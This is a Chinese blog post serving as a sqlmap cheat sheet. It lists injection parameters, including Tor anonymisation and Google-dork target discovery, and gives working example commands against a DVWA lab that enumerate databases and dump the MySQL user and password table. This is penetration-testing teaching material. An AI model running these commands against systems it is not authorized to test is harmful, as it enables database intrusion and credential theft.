sqlmap使用

一、常用参数

sqlmap安装

git clone https://github.com/sqlmapproject/sqlmap.git

常用参数:

-u 		 		sql注入的url
--cookie    	指定cookie
--proxy      	代理
--user-agent    user-agent值

–-random-agent  使用随机user-agent

-g            #从google中获取url, -g "inurl:aspx?id="
--force-ssl   #https站点
--data        #数据库
--param-del   #指定变量分隔符
--method      #指定请求方式,get/post
--timeout     #请求超时时间
--retries     #连接超时重试数(默认3次)
--delay       #每次请求之间的间隔时间(默认没有)
--randomize   #长度、类型与原始值保持一致的前提下,指定每次请求随机取值的参数名
--scope       #过滤日志内容,通过正则表达式筛选对象
--threads     #采用多线程
--tor         #创建 tor 的匿名网络
-a,-all       #查询所有
--hostname    #主机名
--keep-alive  #使用持久 HTTP(S) 连接(与--proxy参数不兼容)


#查询结果参数
--dbs 列出所有数据库
--current-db 当前数据库
--current-user 当前数据库用户
--tables 列出所有表
--columns 列出所有字段
--tables -D "table"  指定某个库的表
--passwords  数据库用户密码
--privileges 查看所有权限
--privileges -U root -v 0 #查看指定某个账号的权限
-D "dvwa"   -T "users"  --columns #查询指定数据库表的字段
###查询dvwa库中users表的下面的字段
--dump -D "dvwa" -T "users" -C "user,avatar,first_name,last_name,password,user_id"
--dump -D "mysql" -T "user" -C "User,password" #查询mysql中的账号密码

  

二、使用例子

#列出所有数据库
python  sqlmap.py  -u "http://10.0.0.138/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1" --cookie "security=low;PHPSESSID=3975b2775d5a09540bb8b91194e7e1a1"   --dbs
#列出所有表
python  sqlmap.py  -u "http://10.0.0.138/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1" --cookie "security=low;PHPSESSID=3975b2775d5a09540bb8b91194e7e1a1"   --tables
#列出某个表的所有字段
python  sqlmap.py  -u "http://10.0.0.138/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1" --cookie "security=low;PHPSESSID=3975b2775d5a09540bb8b91194e7e1a1"   --columns -D "dvwa" -T "users" 
#查看所有账号权限
python  sqlmap.py  -u "http://10.0.0.138/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1" --cookie "security=low;PHPSESSID=3975b2775d5a09540bb8b91194e7e1a1"   --privileges
#查看mysql库中user表的user和password的内容
python  sqlmap.py  -u "http://10.0.0.138/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1" --cookie "security=low;PHPSESSID=3975b2775d5a09540bb8b91194e7e1a1"  --dump -D "mysql" -T "user" -C "User,password" 
#使用cookie和user-agent
python  sqlmap.py  -u "http://10.0.0.138/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1" --cookie "security=low;PHPSESSID=3975b2775d5a09540bb8b91194e7e1a1"   --user-agent "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" --dbs

  

 

 

posted @ 2019-04-03 17:29  巽逸  阅读(210)  评论(0)    收藏  举报